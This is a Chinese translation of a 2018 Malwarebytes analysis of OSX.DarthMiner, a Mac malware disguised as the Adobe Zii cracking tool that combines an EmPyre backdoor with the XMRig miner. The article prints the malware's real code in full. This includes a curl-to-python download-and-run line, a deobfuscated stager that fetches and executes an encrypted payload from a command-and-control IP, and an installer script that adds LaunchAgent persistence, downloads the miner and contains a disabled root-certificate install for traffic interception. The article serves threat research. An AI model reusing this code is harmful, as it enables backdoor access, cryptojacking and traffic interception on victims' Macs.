将EmPyre后门和XMRig挖矿软件结合起来的新型MAC恶意软件曝光

xiaohui Web安全 2018年12月12日发布
Favorite收藏

导语:本周早些时候,Malwarebytes实验室的安全研究人员发现了一种新的恶意软件,它将EmPyre后门和XMRig挖矿软件结合起来,组成了一种新型的MAC恶意软件。

本周早些时候,Malwarebytes实验室的安全研究人员发现了一种新的恶意软件,它将EmPyre后门和XMRig挖矿软件结合起来,组成了一种新型的MAC恶意软件。

目前,研究人员暂时将这个恶意软件命名为OSX.DarthMiner,它会伪装成Adobe Zii应用程序进行传播,adobe zii是一款adobe cc系列mac版非常好用的激活工具,其中Adobe Zii 2019 Mac版是著名破解团队TNT针对Adobe CC 2019 Mac版系列软件推出的破解工具,可以一键激活Adobe 2019 Mac版软件。 Adobe Zii是旨在帮助各种Adobe应用程序盗版的软件。

1.png

从上面的屏幕截图中可以看出,左侧的是真正的Adobe Zii软件使用的Adobe Creative Cloud徽标。右边的是OSX.DarthMiner的图标,它没有直接盗用Adobe Zii的图标,而是另外使用了一个很特别的Automator applet图标。所以研究人员就很纳闷,既然要决定伪装成Adobe Zii软件,为什么不使用它们的图标呢?

恶意行为分析

点击Automator图标后,就会启动伪装的Adobe Zii应用程序,经过测试它只是运行一个shell脚本。

2.png

curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app

此脚本旨在下载并执行Python脚本,然后下载并运行名为sample.app的应用程序。sample.app很简单,它看起来只是Adobe Zii众多版本里的一个版本。

那么Python脚本呢?在分析Python脚本的过程中,研究人员发现该脚本经过了模糊处理,但很容易被反模糊,经过分析,里面包含的脚本如下。

import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
   sys.exit()
import urllib2;
UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://46.226.108.171:4444';t='/news.php';req=urllib2.Request(server+t);
req.add_header('User-Agent',UA);
req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=");
proxy = urllib2.ProxyHandler();
o = urllib2.build_opener(proxy);
urllib2.install_opener(o);
a=urllib2.urlopen(req).read();
IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[]
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
exec(''.join(out))

这个脚本的第一件事就是寻找Little Snitch,Little Snitch是一款Mac上简单易用的防火墙,除了保护我们的隐私数据外,Little Snitch的另一个大作用就是阻止软件的正版验证,Little Snitch可以监控和阻止特定软件的网络连接,例如当你启动Adobe的系列软件时,Little Snitch会通过弹出窗口提醒用户是否允许其网络连接,能够保护用户的隐私数据。如果Little Snitch存在,则恶意软件就会立即停止运行。当然,如果安装了像Little Snitch这样的防火墙,它就会阻止用户下载此脚本的连接,因此在此时进行安全检测毫无价值。

此脚本会打开与EmPyre后端的连接,该后端能够将任意命令推送到受感染的Mac上。后门一旦被打开后,它就会收到一个命令,将以下脚本下载到/private/tmp/uploadminer.sh并执行它。

# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges"
cd ~/Library/LaunchAgents
curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
launchctl load -w com.apple.rig.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl -o config.json http://46.226.108.171/config.json
curl -o xmrig http://46.226.108.171/xmrig
chmod +x ./xmrig
rm -rf ./xmrig2
rm -rf ./config2.json
./xmrig -c config.json &

此脚本会下载并安装恶意软件的其他组件,然后创建了一个名为com.proxy.initialize.plist的启动代理,这主要是为了运行经过模糊处理的Python脚本,来通过后门进行持续攻击。

该脚本还会将XMRig加密器和配置文件下载到/Users/Shared/文件夹中,并设置一个名为com.apple.rig.plist的启动代理,以使XMRig进程在该配置处于活动状态时运行。 “com.apple”名称直接就是一个的红色标志,这代表着危险,它也是研究人员能发现此恶意软件的根本原因。

有趣的是,该脚本中的代码可以用于下载和安装与mitmproxy软件(mitmproxy是一款http代理工具,即可用于中间人攻击,也可用于html抓包调试)相关的根证书,该软件能够拦截所有网络流量,包括(借助证书)加密的“https”流量。但是,该代码已被OSX.DarthMiner的开发者注释掉,并没有被激活。

从表面上乍一看,加密器最多只能通过占用所有的CPU和GPU资源来减慢受害者的Mac电脑的速度,这种恶意软件似乎并没有什么攻击性。但是仔细想想,这些加密器是通过后门发出的命令安装的,不出意外,该软件的开发者很可能通过该后门向Mac发送过其他命令。目前,还无法确切知道此恶意软件可能对受感染系统造成什么伤害,仅仅根据研究人员观察到的采矿行为来定义它,似乎还显得草率。

IOCs

Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

本文翻译自:https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/如若转载,请注明原文地址: https://www.4hou.com/web/15101.html
点赞 3
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论